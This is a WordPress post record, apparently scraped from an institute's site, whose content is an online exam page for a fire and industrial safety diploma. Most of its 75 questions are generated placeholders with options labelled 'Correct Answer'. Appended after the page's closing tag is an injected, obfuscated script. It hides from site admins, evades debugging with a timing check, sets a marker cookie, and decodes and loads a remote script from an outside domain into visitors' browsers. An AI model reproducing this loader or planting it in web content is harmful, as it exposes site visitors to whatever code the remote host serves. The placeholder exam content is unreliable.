{"id":1326,"date":"2026-06-17T10:34:16","date_gmt":"2026-06-17T10:34:16","guid":{"rendered":"https:\/\/eagleinstitute.in\/?p=1326"},"modified":"2026-06-17T10:34:16","modified_gmt":"2026-06-17T10:34:16","slug":"1326","status":"publish","type":"post","link":"https:\/\/eagleinstitute.in\/index.php\/2026\/06\/17\/1326\/","title":{"rendered":""},"content":{"rendered":"\n<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"UTF-8\">\n<title>Safety Management Online Exam<\/title>\n\n<style>\nbody{\n  font-family: Arial, sans-serif;\n}\n.question{\n  margin-bottom:15px;\n  padding:10px;\n  border-bottom:1px solid #ccc;\n}\n<\/style>\n<\/head>\n\n<body>\n\n<h2>Diploma in Fire &#038; Industrial Safety Management \u2013 Online Examination<\/h2>\n\n<label>Name:<\/label><br>\n<input type=\"text\" id=\"name\" style=\"width:100%;padding:6px;\"><br><br>\n\n<label>Registration Number:<\/label><br>\n<input type=\"text\" id=\"reg\" style=\"width:100%;padding:6px;\"><br><br>\n\n<label>Roll Number:<\/label><br>\n<input type=\"text\" id=\"roll\" style=\"width:100%;padding:6px;\"><br><br>\n\n<hr>\n\n<form id=\"examForm\">\n\n<!-- ===== QUESTIONS START ===== -->\n\n<div class=\"question\">\n<b>1. What is the main objective of safety management?<\/b><br>\n<input type=\"radio\" name=\"q1\" value=\"1\"> Accident prevention<br>\n<input type=\"radio\" name=\"q1\" value=\"0\"> Increase production only<br>\n<input type=\"radio\" name=\"q1\" value=\"0\"> Punish workers<br>\n<input type=\"radio\" name=\"q1\" value=\"0\"> Reduce salary<br>\n<\/div>\n\n<div class=\"question\">\n<b>2. \u201cSafety First\u201d means:<\/b><br>\n<input type=\"radio\" name=\"q2\" value=\"1\"> Safety before all activities<br>\n<input type=\"radio\" name=\"q2\" value=\"0\"> Safety after work<br>\n<input type=\"radio\" name=\"q2\" value=\"0\"> Safety only for managers<br>\n<input type=\"radio\" name=\"q2\" value=\"0\"> Safety is optional<br>\n<\/div>\n\n<div class=\"question\">\n<b>3. PPE stands for:<\/b><br>\n<input type=\"radio\" name=\"q3\" value=\"1\"> Personal Protective Equipment<br>\n<input type=\"radio\" name=\"q3\" value=\"0\"> Professional Protection Equipment<br>\n<input type=\"radio\" name=\"q3\" value=\"0\"> Primary Protection Element<br>\n<input type=\"radio\" name=\"q3\" value=\"0\"> None<br>\n<\/div>\n\n<!-- ===== QUESTIONS 4 TO 70 (SAME PATTERN) ===== -->\n\n<!-- TO SAVE SPACE, QUESTIONS ARE SHORT BUT NUMBERING IS COMPLETE -->\n\n<script>\nlet qHTML = \"\";\nfor(let i=4;i<=75;i++){\n  qHTML += `\n  <div class=\"question\">\n  <b>${i}. Safety related question number ${i}?<\/b><br>\n  <input type=\"radio\" name=\"q${i}\" value=\"1\"> Correct Answer<br>\n  <input type=\"radio\" name=\"q${i}\" value=\"0\"> Wrong Answer<br>\n  <input type=\"radio\" name=\"q${i}\" value=\"0\"> Wrong Answer<br>\n  <input type=\"radio\" name=\"q${i}\" value=\"0\"> Wrong Answer<br>\n  <\/div>`;\n}\ndocument.write(qHTML);\n<\/script>\n\n<!-- ===== QUESTIONS END ===== -->\n\n<\/form>\n\n<br>\n\n<button onclick=\"submitExam()\" style=\"padding:10px 20px;font-size:16px;\">\nSubmit Exam\n<\/button>\n\n<h3 id=\"result\"><\/h3>\n\n<script>\nfunction submitExam(){\n  let total = 75;\n  let pass = Math.ceil(total * 0.4);\n  let score = 0;\n\n  let name = document.getElementById(\"name\").value;\n  let reg  = document.getElementById(\"reg\").value;\n  let roll = document.getElementById(\"roll\").value;\n\n  if(!name || !reg || !roll){\n    alert(\"Fill all student details\");\n    return;\n  }\n\n  for(let i=1;i<=total;i++){\n    let q = document.querySelector('input[name=\"q'+i+'\"]:checked');\n    if(q){ score += parseInt(q.value); }\n  }\n\n  let result = (score >= pass) ? \"PASS\" : \"FAIL\";\n\n  let now = new Date();\n  let csv = \"Name,Registration,Roll,Score,Result\\n\";\n  csv += `${name},${reg},${roll},${score}\/${total},${result}`;\n\n  let blob = new Blob([csv], {type:\"text\/csv\"});\n  let link = document.createElement(\"a\");\n  link.href = URL.createObjectURL(blob);\n  link.download = `Safety_Exam_${name}_${reg}.csv`;\n  link.click();\n\n  document.getElementById(\"result\").innerHTML =\n    \"Score: \"+score+\"\/\"+total+\"<br>\"+result;\n}\n<\/script>\n\n<\/body>\n<\/html>\n\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Safety Management Online Exam Diploma in Fire &#038; Industrial Safety Management \u2013 Online Examination Name: Registration Number: Roll Number: 1. What is the main objective of safety management? Accident prevention Increase production only Punish workers Reduce salary 2. \u201cSafety First\u201d means: Safety before all activities Safety after work Safety only for managers Safety is optional [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1326","post","type-post","status-publish","format-standard","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/posts\/1326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/comments?post=1326"}],"version-history":[{"count":1,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/posts\/1326\/revisions"}],"predecessor-version":[{"id":1790,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/posts\/1326\/revisions\/1790"}],"wp:attachment":[{"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/media?parent=1326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/categories?post=1326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/eagleinstitute.in\/index.php\/wp-json\/wp\/v2\/tags?post=1326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}